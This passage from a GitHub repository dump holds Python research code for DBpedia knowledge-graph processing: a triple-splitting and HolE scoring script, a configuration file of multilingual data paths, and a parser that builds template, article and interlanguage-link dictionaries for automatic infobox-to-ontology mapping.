triples\" % len(triples))\n\n\tdataDict[\"entities\"] = list(entitySet)\n\tdataDict[\"relations\"] = predicateDict.values()\n\tIDX = list(range(len(triples)))\n\tshuffle(IDX)\n\tdataDict[\"train_subs\"] = list(triples[IDX[:-20000]])\n\tdataDict[\"valid_subs\"] = list(triples[IDX[-20000:-10000]])\n\tdataDict[\"test_subs\"] = list(triples[IDX[-10000:]])\n\tpkl_utils._save(config.DATA_DICT[lang], dataDict)\n\n\t_log.info(\"train size: %d\" % len(dataDict[\"train_subs\"]))\n\t_log.info(\"valid size: %d\" % len(dataDict[\"valid_subs\"]))\n\t_log.info(\"test size: %d\" % len(dataDict[\"test_subs\"]))\n\n\t_log.info(\"parsing complete\")\n\ndef main(options):\n\tlang = options.lang\n\tp = options.parse\n\tt = options.train\n\tncomp = options.ncomp\n\tme = options.me\n\tfin = options.fin\n\tfout = options.fout\n\n\tif p:\n\t\tparse(lang)\n\tif t:\n\t\tcmd = \"python run_hole.py --fin %s --fout %s --test-all 50 --nb 100 --me %d \\\n\t\t\t--margin 0.2 --lr 0.1 --ncomp %d\" % (lang, config.HOLE_OUTPUT[lang], me, ncomp)\n\t\tos.system(cmd)\n\t\n\thole = pkl_utils._load(config.HOLE_OUTPUT[lang])\n\tdata_dict = pkl_utils._load(config.DATA_DICT[lang])\n\tmodel = hole[\"model\"]\n\tentityDict = { y:x for x, y in enumerate(data_dict[\"entities\"])}\n\tpredicateDict = { y:x for x, y in enumerate(data_dict[\"relations\"])}\n\tdf = pd.read_csv(fin, names=[\"s\", \"p\", \"o\"])\n\tdf[\"s\"] = df[\"s\"].map(entityDict)\n\tdf[\"p\"] = df[\"p\"].map(predicateDict)\n\tdf[\"o\"] = df[\"o\"].map(entityDict)\n\tscores = model._scores(list(df[\"s\"]), list(df[\"p\"]), list(df[\"o\"]))\n\tpd.DataFrame(scores).to_csv(fout, index=False, header=False)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" }, { "alpha_fraction": 0.6039702296257019, "alphanum_fraction": 0.6142680048942566, "avg_line_length": 34.043479919433594, "blob_id": "fc3b2cd86ce2a544ef6ef0a5fec6c0ec08ac1cec", "content_id": "b1a5d4aa5e8458e793b7d47db497503914e1797b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8069, "license_type": "permissive", "max_line_length": 63, "num_lines": 230, "path": "/Code/config.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# --------------------- PATH ---------------------------\n\n# Set the paths for data directory and output directory\nROOT_DIR = \"/nfs/data1/pxu4\"\nDATA_DIR = \"%s/DBpedia/Data\" % ROOT_DIR\nOUTPUT_DIR = \"%s/DBpedia/Output\" % ROOT_DIR\n\nONTOLOGY = \"%s/dbpedia_2015-10.nt\" % DATA_DIR\nONTOLOGY_TREE = \"%s/ontology.pkl\" % OUTPUT_DIR\n\nEXISTING_MAPPING = {\n\t\"en\" : \"%s/mapping/existing_mapping_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/mapping/existing_mapping_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/mapping/existing_mapping_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/mapping/existing_mapping_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/mapping/existing_mapping_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/mapping/existing_mapping_es.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/mapping/existing_mapping_bg.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/mapping/existing_mapping_zh.ttl\" % DATA_DIR,\n}\n\nEXISTING_MAPPING_OUTPUT = {\n\t\"en\" : \"%s/mapping/existing_mapping_en.csv\" % OUTPUT_DIR,\n\t\"de\" : \"%s/mapping/existing_mapping_de.csv\" % OUTPUT_DIR,\n\t\"it\" : \"%s/mapping/existing_mapping_it.csv\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/mapping/existing_mapping_pt.csv\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/mapping/existing_mapping_fr.csv\" % 
OUTPUT_DIR,\n\t\"es\" : \"%s/mapping/existing_mapping_es.csv\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/mapping/existing_mapping_bg.csv\" % OUTPUT_DIR,\n}\n\nINSTANCE_TYPES = {\n\t\"en\" : \"%s/type/instance_types_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/type/instance_types_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/type/instance_types_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/type/instance_types_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/type/instance_types_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/type/instance_types_es.ttl\" % DATA_DIR,\n\t\"wikidata\" : \"%s/type/instance_types_wikidata.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/type/instance_types_bg.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/type/instance_types_zh.ttl\" % DATA_DIR,\n}\n\nLITERALS = {\n\t\"en\" : \"%s/property/mappingbased_literals_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/property/mappingbased_literals_de.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/property/mappingbased_literals_bg.ttl\" % DATA_DIR,\n}\n\nOBJECTS = {\n\t\"en\" : \"%s/property/mappingbased_objects_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/property/mappingbased_objects_de.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/property/mappingbased_objects_bg.ttl\" % DATA_DIR,\n}\n\nENTITY = {\n\t\"en\" : \"%s/tensor/entity_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/entity_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/entity_bg.pkl\" % OUTPUT_DIR,\n}\n\nPREDICATE = {\n\t\"en\" : \"%s/tensor/predicate_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/predicate_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/predicate_bg.pkl\" % OUTPUT_DIR,\n}\n\nTENSOR = {\n\t\"en\" : \"%s/tensor/tensor_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/tensor_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/tensor_bg.pkl\" % OUTPUT_DIR,\n}\n\nINSTANCE = {\n\t\"en\" : \"%s/tensor/instance_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/instance_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/instance_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE = {\n\t\"en\" : \"%s/tensor/type_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/type_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/type_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE_MATRIX = {\n\t\"en\" : \"%s/tensor/type_matrix_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/type_matrix_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/type_matrix_bg.pkl\" % OUTPUT_DIR,\n}\n\nTYPE_DICT = {\n\t\"en\" : \"%s/type/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/type/de.pkl\" % OUTPUT_DIR,\n\t\"it\" : \"%s/type/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/type/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/type/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/type/es.pkl\" % OUTPUT_DIR,\n\t\"wikidata\" : \"%s/type/wikidata.pkl\" % OUTPUT_DIR,\n}\n\nARTICLE_TEMPLATES = {\n\t\"en\" : \"%s/article/article_templates_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/article/article_templates_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/article/article_templates_it.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/article/article_templates_pt.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/article/article_templates_fr.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/article/article_templates_es.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/article/article_templates_zh.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/article/article_templates_bg.ttl\" % DATA_DIR,\n}\n\nTEMPLATE2ARTICLE = {\n\t\"en\" : \"%s/template2article/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/template2article/de.pkl\" % OUTPUT_DIR,\n\t\"it\" : \"%s/template2article/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/template2article/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/template2article/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/template2article/es.pkl\" % OUTPUT_DIR,\n\t\"zh\" : \"%s/template2article/zh.pkl\" 
% OUTPUT_DIR,\n\t\"bg\" : \"%s/template2article/bg.pkl\" % OUTPUT_DIR,\n}\n\nARTICLE2TEMPLATE = {\n\t\"en\" : \"%s/article2template/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/article2template/de.pkl\" % OUTPUT_DIR,\n\t\"it\" : \"%s/article2template/it.pkl\" % OUTPUT_DIR,\n\t\"pt\" : \"%s/article2template/pt.pkl\" % OUTPUT_DIR,\n\t\"fr\" : \"%s/article2template/fr.pkl\" % OUTPUT_DIR,\n\t\"es\" : \"%s/article2template/es.pkl\" % OUTPUT_DIR,\n\t\"zh\" : \"%s/article2template/zh.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/article2template/bg.pkl\" % OUTPUT_DIR,\n}\n\nILL = {\n\t\"en\" : \"%s/link/interlanguage_links_en.ttl\" % DATA_DIR,\n\t\"de\" : \"%s/link/interlanguage_links_de.ttl\" % DATA_DIR,\n\t\"it\" : \"%s/link/interlanguage_links_it.ttl\" % DATA_DIR,\n\t\"fr\" : \"%s/link/interlanguage_links_fr.ttl\" % DATA_DIR,\n\t\"pt\" : \"%s/link/interlanguage_links_pt.ttl\" % DATA_DIR,\n\t\"es\" : \"%s/link/interlanguage_links_es.ttl\" % DATA_DIR,\n\t\"zh\" : \"%s/link/interlanguage_links_zh.ttl\" % DATA_DIR,\n\t\"bg\" : \"%s/link/interlanguage_links_bg.ttl\" % DATA_DIR,\n}\n\nILL_DICT = {\n\t\"zh2en\" : \"%s/link/dict_zh2en.pkl\" % OUTPUT_DIR,\n\t\"zh2de\" : \"%s/link/dict_zh2de.pkl\" % OUTPUT_DIR,\n\t\"zh2it\" : \"%s/link/dict_zh2it.pkl\" % OUTPUT_DIR,\n\t\"zh2fr\" : \"%s/link/dict_zh2fr.pkl\" % OUTPUT_DIR,\n\t\"zh2pt\" : \"%s/link/dict_zh2pt.pkl\" % OUTPUT_DIR,\n\t\"zh2es\" : \"%s/link/dict_zh2es.pkl\" % OUTPUT_DIR,\n\t\"zh2wikidata\" : \"%s/link/dict_zh2wikidata.pkl\" % OUTPUT_DIR,\n\t\"bg2en\" : \"%s/link/dict_bg2en.pkl\" % OUTPUT_DIR,\n\t\"bg2de\" : \"%s/link/dict_bg2de.pkl\" % OUTPUT_DIR,\n\t\"bg2it\" : \"%s/link/dict_bg2it.pkl\" % OUTPUT_DIR,\n\t\"bg2fr\" : \"%s/link/dict_bg2fr.pkl\" % OUTPUT_DIR,\n\t\"bg2pt\" : \"%s/link/dict_bg2pt.pkl\" % OUTPUT_DIR,\n\t\"bg2es\" : \"%s/link/dict_bg2es.pkl\" % OUTPUT_DIR,\n\t\"bg2wikidata\" : \"%s/link/dict_bg2wikidata.pkl\" % OUTPUT_DIR,\n}\n\nENTITY_MATRIX = {\n\t\"zh2en\" : \"%s/matrix/zh2en.csv\" % OUTPUT_DIR,\n\t\"zh2de\" : \"%s/matrix/zh2de.csv\" % OUTPUT_DIR,\n\t\"zh2fr\" : \"%s/matrix/zh2fr.csv\" % OUTPUT_DIR,\n\t\"zh2pt\" : \"%s/matrix/zh2pt.csv\" % OUTPUT_DIR,\n\t\"zh2it\" : \"%s/matrix/zh2it.csv\" % OUTPUT_DIR,\n\t\"zh2es\" : \"%s/matrix/zh2es.csv\" % OUTPUT_DIR,\n\t\"zh2wikidata\" : \"%s/matrix/zh2wikidata.csv\" % OUTPUT_DIR,\n\t\"bg2en\" : \"%s/matrix/bg2en.csv\" % OUTPUT_DIR,\n\t\"bg2de\" : \"%s/matrix/bg2de.csv\" % OUTPUT_DIR,\n\t\"bg2it\" : \"%s/matrix/bg2it.csv\" % OUTPUT_DIR,\n\t\"bg2fr\" : \"%s/matrix/bg2fr.csv\" % OUTPUT_DIR,\n\t\"bg2pt\" : \"%s/matrix/bg2pt.csv\" % OUTPUT_DIR,\n\t\"bg2es\" : \"%s/matrix/bg2es.csv\" % OUTPUT_DIR,\n\t\"bg2wikidata\" : \"%s/matrix/bg2wikidata.csv\" % OUTPUT_DIR,\n}\n\nMAPPED_INFOBOX = {\n\t\"zh\" : \"%s/predicted/zh.csv\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/predicted/bg.csv\" % OUTPUT_DIR,\n}\n\nDATA_DICT = {\n\t\"bg\" : \"%s/embedding/bg.pkl\" % OUTPUT_DIR,\n\t\"en\" : \"%s/embedding/en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/embedding/de.pkl\" % OUTPUT_DIR,\n}\n\nRESCAL_OUTPUT = {\n\t\"en\" : \"%s/tensor/rescal_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/tensor/rescal_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/tensor/rescal_bg.pkl\" % OUTPUT_DIR,\n}\n\nHOLE_OUTPUT = {\n\t\"en\" : \"%s/embedding/hole_en.pkl\" % OUTPUT_DIR,\n\t\"de\" : \"%s/embedding/hole_de.pkl\" % OUTPUT_DIR,\n\t\"bg\" : \"%s/embedding/hole_bg.pkl\" % OUTPUT_DIR,\n}\n\n# --------------------- PARAM --------------------------\nLANG_PREFIX = {\n\t\"en\" : \"http://dbpedia.org/resource/\",\n\t\"de\" : \"http://de.dbpedia.org/resource/\",\n\t\"it\" : 
\"http://it.dbpedia.org/resource/\",\n\t\"fr\" : \"http://fr.dbpedia.org/resource/\",\n\t\"es\" : \"http://es.dbpedia.org/resource/\",\n\t\"pt\" : \"http://pt.dbpedia.org/resource/\",\n\t\"zh\" : \"http://zh.dbpedia.org/resource/\",\n\t\"bg\" : \"http://bg.dbpedia.org/resource/\",\n\t\"wikidata\" : \"http://wikidata.dbpedia.org/resource/\",\n}\n\nTEMPLATE_NAME = {\n\t\"en\" : \"Template:\",\n\t\"zh\" : \"Template:\",\n\t\"bg\" : \"Шаблон:\",\n\t\"de\" : \"Vorlage:\",\n\t\"it\" : \"Template:\",\n\t\"pt\" : \"Predefinição:\",\n\t\"fr\" : \"Modèle:\",\n\t\"es\" : \"Plantilla:\",\n}\n\nMISSING_VALUE_STRING = \"NA\"\n\n# --------------------- OTHER --------------------------\n" }, { "alpha_fraction": 0.6762682199478149, "alphanum_fraction": 0.6895503401756287, "avg_line_length": 32.96195602416992, "blob_id": "30fef1229bdddae8922b82b4910a0c15a7507027", "content_id": "b509bcc83cebe82e6ec4dc726dc6f65dbd8c02f9", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6249, "license_type": "permissive", "max_line_length": 174, "num_lines": 184, "path": "/Code/parse.py", "repo_name": "afcarl/mappings-autogeneration", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport pandas as pd\nimport rdflib.graph as g\nfrom utils import time_utils, pkl_utils\nimport sys\nimport config\nfrom optparse import OptionParser\nimport os\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef parse_args(parser):\n\tparser.add_option(\"-l\", \"--lang\", default=\"zh\", type=\"string\", dest=\"lang\", help=\"target language\")\n\tparser.add_option(\"-p\", \"--pivot\", default=\"en\", type=\"string\", dest=\"pivot\", help=\"pivot language\")\n\t#parser.add_option(\"-m\", \"--mapping\", default=True, action=\"store_false\", dest=\"mapping\", help=\"don't get existing mapping for the pivot language\")\n\t#parser.add_option(\"-t\", \"--template\", default=True, action=\"store_false\", dest=\"template\", help=\"don't get the dict from template to article for the target language\")\n\t#parser.add_option(\"-a\", \"--article\", default=True, action=\"store_false\", dest=\"article\", help=\"don't get the dict from article to template for the pivot language\")\n\t#parser.add_option(\"-i\", \"--inter\", default=True, action=\"store_false\", dest=\"inter\", help=\"don't get the interlanguage dict from the target language to the pivot language\")\n\t(options, args) = parser.parse_args()\n\treturn options, args\n\ndef getExistingMapping(lang=\"en\"):\n\tprint \"[%s]: parse existing mapping for language %s\" % (time_utils._timestamp(), lang)\n\tG = g.Graph()\n\tG.parse(config.EXISTING_MAPPING[lang], format=\"n3\")\n\n\tq = '''\nPREFIX rr: <http://www.w3.org/ns/r2rml#>\n\nSELECT ?template ?class\nWHERE {\n\t?template rr:subjectMap ?mapping .\n\t?mapping rr:class ?class .\n}\n'''\n\tresults = G.query(q)\n\tmapping = [row[0] for row in results]\n\tontology = [row[1] for row in results]\n\tdf = pd.DataFrame({'mapping':mapping, 'ontology':ontology})\n\n\tdf[\"template\"] = df[\"mapping\"].apply(lambda x: config.TEMPLATE_NAME[lang] + x[47:])\n\tdf.to_csv(config.EXISTING_MAPPING_OUTPUT[lang], index=False)\n\tprint \"[%s]: parsing complete\" % time_utils._timestamp()\n\ndef Template2Article(lang=\"en\"):\n\tprint \"[%s]: generate template2article dict for language %s\" % (time_utils._timestamp(), lang)\n\tinfile = open(config.ARTICLE_TEMPLATES[lang])\n\tprefix = config.LANG_PREFIX[lang]\n\tlen_prefix = len(prefix)\n\ttemplateDict = {}\n\tfor line in 
infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tarticle = row[0][1:-1]\n\t\ttemplate = row[2][1:-1]\n\t\tarticle = article[len_prefix:]\n\t\ttemplate = template[len_prefix:]\n\n\t\tif \"/\" in template:\n\t\t\tcontinue\n\n\t\tif template in templateDict:\n\t\t\ttemplateDict[template].append(article)\n\t\telse:\n\t\t\ttemplateDict[template] = [article, ]\n\tprint \"%d templates in total\" % len(templateDict)\n\tpkl_utils._save(config.TEMPLATE2ARTICLE[lang], templateDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef Article2Template(lang=\"en\"):\n\tprint \"[%s]: generate article2template dict for language %s\" % (time_utils._timestamp(), lang)\n\tinfile = open(config.ARTICLE_TEMPLATES[lang])\n\tprefix = config.LANG_PREFIX[lang]\n\tlen_prefix = len(prefix)\n\tarticleDict = {}\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tarticle = row[0][1:-1]\n\t\ttemplate = row[2][1:-1]\n\t\tarticle = article[len_prefix:]\n\t\ttemplate = template[len_prefix:]\n\n\t\tif \"/\" in template:\n\t\t\tcontinue\n\n\t\tif article in articleDict:\n\t\t\tarticleDict[article].append(template)\n\t\telse:\n\t\t\tarticleDict[article] = [template, ]\n\tprint \"%d articles in total\" % len(articleDict)\n\tpkl_utils._save(config.ARTICLE2TEMPLATE[lang], articleDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef getILL(lang, target):\n\tprint \"[%s]: generate ILL dict from language %s to language %s\" % (time_utils._timestamp(), lang, target)\n\tinfile = open(config.ILL[lang])\n\tprefix1 = config.LANG_PREFIX[lang]\n\tprefix2 = config.LANG_PREFIX[target]\n\tlen1 = len(prefix1)\n\tlen2 = len(prefix2)\n\tlinkDict = {}\n\tfor line in infile.readlines():\n\t\tif line[0] != \"<\":\n\t\t\tcontinue\n\t\trow = line.split()\n\t\tlang1 = row[0][1:-1]\n\t\tlang2 = row[2][1:-1]\n\t\tif prefix1 not in lang1:\n\t\t\tcontinue\n\t\tif prefix2 not in lang2:\n\t\t\tcontinue\n\t\tlang1 = lang1[len1:]\n\t\tlang2 = lang2[len2:]\n\t\tlinkDict[lang1] = lang2\n\tprint \"%d links in total\" % len(linkDict)\n\tpkl_utils._save(config.ILL_DICT[\"%s2%s\" % (lang, target)], linkDict)\n\tprint \"[%s]: generation complete\" % time_utils._timestamp()\n\ndef process(lang, pivot):\n\tprint \"[%s]: process for language %s\" % (time_utils._timestamp(), lang)\n\tlinkDict = pkl_utils._load(config.ILL_DICT[\"%s2%s\" % (lang, pivot)])\n\ttemplateDict = pkl_utils._load(config.TEMPLATE2ARTICLE[lang])\n\tarticleDict = pkl_utils._load(config.ARTICLE2TEMPLATE[pivot])\n\tmapping = pd.read_csv(config.EXISTING_MAPPING_OUTPUT[pivot], index_col=\"template\")\n\ttemplate1 = []; template2 = []\n\tarticle1 = []; article2 = []; ontology = []\n\tfor template in templateDict:\n\t\tarticles = templateDict[template]\n\t\tfor article in articles:\n\t\t\tif article in linkDict:\n\t\t\t\ttmp = linkDict[article]\n\t\t\t\ttemplate1.append(template)\n\t\t\t\tarticle1.append(article)\n\t\t\t\tarticle2.append(tmp)\n\t\t\t\tif tmp in articleDict:\n\t\t\t\t\ttemplateList = articleDict[tmp]\n\t\t\t\telse:\n\t\t\t\t\ttemplateList = []\n\t\t\t\tc = \"\"\n\t\t\t\tt = \"\"\n\t\t\t\tfor Template in templateList:\n\t\t\t\t\tif Template in mapping.index:\n\t\t\t\t\t\tc = mapping.at[Template, \"ontology\"]\n\t\t\t\t\t\tt = Template\n\t\t\t\ttemplate2.append(t)\n\t\t\t\tontology.append(c)\n\n\tdata = {\"template1\":template1, \"article1\":article1, \"template2\":template2, \\\n\t\t\t\"article2\":article2, \"ontology\":ontology}\n\tdf = 
pd.DataFrame(data)\n\tdf.to_csv(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)], index=False)\n\tprint \"[%s]: processing complete\" % time_utils._timestamp()\n\n\ndef main(options):\n\tlang = options.lang\n\tpivot = options.pivot\n\t#mapping = options.mapping\n\t#template = options.template\n\t#article = options.article\n\t#inter = options.inter\n\t\n\tif not os.path.isfile(config.EXISTING_MAPPING_OUTPUT[pivot]):\n\t\tgetExistingMapping(lang=pivot)\n\t\n\tif not os.path.isfile(config.TEMPLATE2ARTICLE[lang]):\n\t\tTemplate2Article(lang=lang)\n\t\n\tif not os.path.isfile(config.ARTICLE2TEMPLATE[pivot]):\n\t\tArticle2Template(lang=pivot)\n\t\n\tif not os.path.isfile(config.ILL_DICT[\"%s2%s\" % (lang, pivot)]):\n\t\tgetILL(lang=lang, target=pivot)\n\n\tif not os.path.isfile(config.ENTITY_MATRIX[\"%s2%s\" % (lang, pivot)]):\n\t\tprocess(lang=lang, pivot=pivot)\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\toptions, args = parse_args(parser)\n\tmain(options)\n" } ]
15
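The frequency-based rule that the README and `predict.py` in the files above describe boils down to a thresholded majority vote. As a minimal, self-contained sketch (the helper `map_template` and the sample class list are hypothetical, not part of the repository; it assumes the same strict `> C` occurrence and `> L` frequency cutoffs that `predict.py` applies):

```python
from collections import Counter

def map_template(pivot_classes, L=0.5, C=10):
    """pivot_classes: DBpedia classes of the pivot-language pages linked to one template."""
    if len(pivot_classes) <= C:
        return None  # too few supporting pages to trust the vote
    top_class, count = Counter(pivot_classes).most_common(1)[0]
    if float(count) / len(pivot_classes) <= L:
        return None  # the most frequent class is not dominant enough
    return top_class

# e.g. map_template(["Software"] * 9 + ["owl#Thing"] * 2) returns "Software"
```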
wilben/Visualization-of-Latent-Factors-from-Movies
https://github.com/wilben/Visualization-of-Latent-Factors-from-Movies
5928d588fba58184d7752eb12fa406d36af2e0b5
b0bddd84e30b24afe7c932aec5e3b2b7c9083b28
16957d0791368dfcf7154e348a1efdd9fb9c5f73
refs/heads/master
2020-03-18T01:57:26.298946
2015-04-21T00:04:59
2015-04-21T00:04:59
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5377787947654724, "alphanum_fraction": 0.5464206337928772, "avg_line_length": 28.944055557250977, "blob_id": "373793423f68d7c3da9283b02a26901fd24d6988", "content_id": "eb7f6171fad1ff2e0496fc15693fe2e3729e8ac5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8563, "license_type": "no_license", "max_line_length": 79, "num_lines": 286, "path": "/main.py", "repo_name": "wilben/Visualization-of-Latent-Factors-from-Movies", "src_encoding": "UTF-8", "text": "#Visualization-of-Latent-Factors-from-Movies\nimport numpy as np\nfrom scipy.sparse import coo_matrix\nimport random\nimport copy\nfrom numpy.linalg import norm\nfrom numpy.linalg import inv\nimport pickle as pk\nfrom sklearn.decomposition import TruncatedSVD\n\ndef readMovie():\n ''' Read movie data-set from file.\n \n Returns:\n movie matrix: each column is the feature vector for a movie\n id_2_name: a dict of {movie_id: movie name}\n id_2_row: a dict of {movie_id: row number in the movie matrix}\n Note we keep this dict mostly because Python starts index\n from 0 while the data-set starts from id=0.\n '''\n\n # Initialize all dicts\n id_2_name = {}\n id_2_row = {}\n \n # {movie_id: feature vector}, to help construct movie matrix\n features = {}\n \n # Parsing from file, also construct id_2_name along the way\n with open('movies.txt', 'r') as fin:\n data = fin.readline().strip().split('\\r')\n for line in data:\n line = line.split('\\t')\n id = int(line[0])\n id_2_name[id] = line[1]\n features[id] = [float(d) for d in line[2:]]\n\n # Initialize movie matrix\n f_mat = []\n\n # Construct id_2_row and movie matrix\n for row, id in enumerate(sorted(features)):\n id_2_row[id] = row\n f_mat.append(features[id])\n\n return np.array(f_mat), id_2_name, id_2_row\n\n\ndef readUser(mid_2_col):\n ''' Read user data-set from file.\n Args:\n mid_2_col: a dict of {movie_id: column number in the rating matrix}\n Note we keep this because Python starts index from 0 wihle\n the data-set starts from 1.\n \n Returns:\n rating matrix: entry(i, j) means the rating of user i to movie j\n uid_2_row: a dict of {user_id: row number in the rating matrix}\n Note we keep this because Python starts index from 0 wihle\n the data-set starts from 1.\n obs: a list of (i, j), where entry (i, j) of the rating matrix is\n an observed rating instead of a zero entry.\n '''\n \n # Parse rating from data\n with open('data.txt', 'r') as fin:\n data = fin.readline().strip().split('\\r')\n ratings = [[int(d) for d in line.split('\\t')] for line in data]\n \n # Construct uid_2_row\n uid_2_row = {}\n for row, uid in enumerate(sorted(set([r[0] for r in ratings]))):\n uid_2_row[uid] = row\n\n # Construct rating matrix from sparse matrix\n # Also construct the list of observed entry coordinates (obs)\n obs = []\n rows = []\n cols = []\n data = []\n for r in ratings:\n uid, mid, rating = r\n rows.append(uid_2_row[uid])\n cols.append(mid_2_col[mid])\n data.append(float(rating))\n obs.append((uid_2_row[uid], mid_2_col[mid]))\n\n return coo_matrix((data, (rows, cols))).toarray(), uid_2_row, obs\n\n\ndef readUVab(fname):\n '''Reads computed U, V, a, b from file.\n \n Args:\n fname: a string, a pickle file name.\n \n Returns:\n U: latent factor matrix for users\n V: latent factor matrix for movies\n a: offset vector for users\n b: offset vector for movies\n '''\n \n with open(fname, 'r') as fin:\n data = pk.load(fin)\n return data['U'], data['V'], data['a'], data['b']\n\n\ndef saveUVab(fname, U, V, a, b):\n 
'''Saves computed U, V, a, b to file.\n    \n    Args:\n        fname: a string, a file name to save to\n        U: latent factor matrix for users\n        V: latent factor matrix for movies\n        a: offset vector for users\n        b: offset vector for movies\n    '''\n\n    with open(fname, 'w') as fout:\n        pk.dump({'U': U, 'V': V, 'a': a, 'b': b}, fout)\n\n\ndef svd2d(V, U):\n    '''Performs singular value decomposition on V, and applies a 2D projection\n    on V and U. We basically use sklearn's API.\n    \n    Args:\n        V: the latent matrix for movies\n        U: the latent matrix for users\n    \n    Returns:\n        tsvd: sklearn's svd object that has already trained on V\n        V2: projected V in 2D\n        U2: projected U in 2D\n    '''\n    tsvd = TruncatedSVD()\n    tsvd.fit(V)\n    return tsvd, tsvd.transform(V), tsvd.transform(U)\n\n\ndef sgd(Y, M, N, K, obs, lmb=.001, rate=.001, decay=.8):\n    '''Performs stochastic gradient descent for matrix factorization.\n    \n    Args:\n        Y: the M by N ratings matrix\n        M: number of users\n        N: number of movies\n        K: number of latent factors\n        obs: a list of observed rating coordinates, i.e. if (i, j) in obs,\n            then Y[i, j] is a non-zero entry / valid rating.\n        lmb: regularization coefficient\n        rate: initial learning rate\n        decay: the change in learning rate after each iteration\n    \n    Returns:\n        U: latent factor matrix for users (M by K)\n        V: latent factor matrix for movies (N by K)\n        a: offset vector for users (dim M)\n        b: offset vector for movies (dim N)\n    '''\n    # Threshold for convergence\n    eps = .001\n    # Max number of iterations\n    max_iter = 1000\n    # Current iteration index\n    n = 0\n\n    # Initialize each U, V, a, b\n    new_U = np.random.rand(M, K)\n    new_V = np.random.rand(N, K)\n    new_a = np.random.rand(M)\n    new_b = np.random.rand(N)\n    \n    U = np.zeros((M, K))\n    V = np.zeros((N, K))\n    a = np.zeros(M)\n    b = np.zeros(N)\n    \n    while True:\n        # Check whether we have converged\n        if norm(U - new_U)/rate < eps and \\\n           norm(V - new_V)/rate < eps and \\\n           norm(a - new_a)/rate < eps and \\\n           norm(b - new_b)/rate < eps:\n            return U, V, a, b\n        \n        # Check whether we have reached the max number of iterations\n        n += 1\n        if n > max_iter:\n            return U, V, a, b\n\n        # Update U, V, a, b\n        U = new_U.copy()\n        V = new_V.copy()\n        a = new_a.copy()\n        b = new_b.copy()\n        \n        # Shuffle the coordinates of observed ratings\n        # (for stochastic gradient descent)\n        